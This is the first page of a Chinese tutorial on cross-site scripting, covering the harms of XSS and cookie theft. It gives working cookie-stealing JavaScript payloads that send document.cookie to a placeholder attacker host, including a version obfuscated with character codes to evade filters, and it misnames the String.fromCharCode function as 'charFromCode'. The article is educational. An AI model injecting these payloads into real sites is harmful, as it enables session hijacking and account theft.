搜索:
首页 >> 网站安全 >> 跨站脚本攻击深入解析:跨站危害及cookie盗窃

跨站脚本攻击深入解析:跨站危害及cookie盗窃

2009-12-24 作者:康凯 来源:中国asp之家 投递文章

跨站脚本的名称源自于这样一个事实,即一个Web 站点(或者人)可以把他们的选择的代码越过安全边界线注射到另一个不同的、有漏洞的Web 站点中。当这些注入的代码作为目标站点的代码在受害者的浏览器中执行时,攻击者就能窃取相应的敏感数据,并强迫用户做一些用户非本意的事情。

在本文的上篇中,我们详细介绍了跨站脚本漏洞利用的过程,并对HTML注入进行深入分析;而本文将详细介绍跨站脚本的危害,以及攻击者是如何诱骗受害者的;最后介绍针对跨站脚本攻击的防御措施。

一、跨站脚本的危害

XSS是一种对Web应用程序的用户发动的攻击,利用它攻击者能装扮成被攻击的用户来完全控制Web应用程序,即便Web应用程序位于一个防火墙之后并且攻击者无法直接接触该Web应用程序也是如此。XSS一般不会对用户的机器造成损害,也不会对Web应用程序服务器直接造成破坏。如果成功,攻击者可以做三种事情:

窃取Cookie

在受害用户面前假冒成Web应用程序

在Web应用程序面前假冒成受害用户

二、窃取Cookie

Cookie一般控制着对Web应用程序的访问,如果攻击者偷窃了受害用户的Cookie,那么攻击者就可以使用受害者的Cookie来完全控制受害者的帐户。对于Cookie来说,其最佳实践就是让它在一段时间后过期,这样的话攻击者就只能在有限的时间内访问受害者的帐户。可以利用下面的代码来窃取Cookie:

var x=new Image();x.src=‘http://attackerssite.com/eatMoreCookies?c=’+document.cookie;

或者像下面这样:

document.write(“〈 img src=‘http://attackerssite.com/eatMoreCookies”+“?c=”+document.cookie+“’〉”);

如果某些字符是禁止的,则将其转换为ASCII的十进制数,然后使用JavaScript的String.charFromCode()函数即可。下列JavaScript等价于前面的JavaScript:

以下为引用的内容:

eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,

97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,

97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,

101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,

100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));

1   2  3  4 下一页 尾 页
Tags:跨站  脚本攻击  cookie 
相关文章
手机版 网站安全 Asp之家 Aspxhome.com
闽ICP备06017341号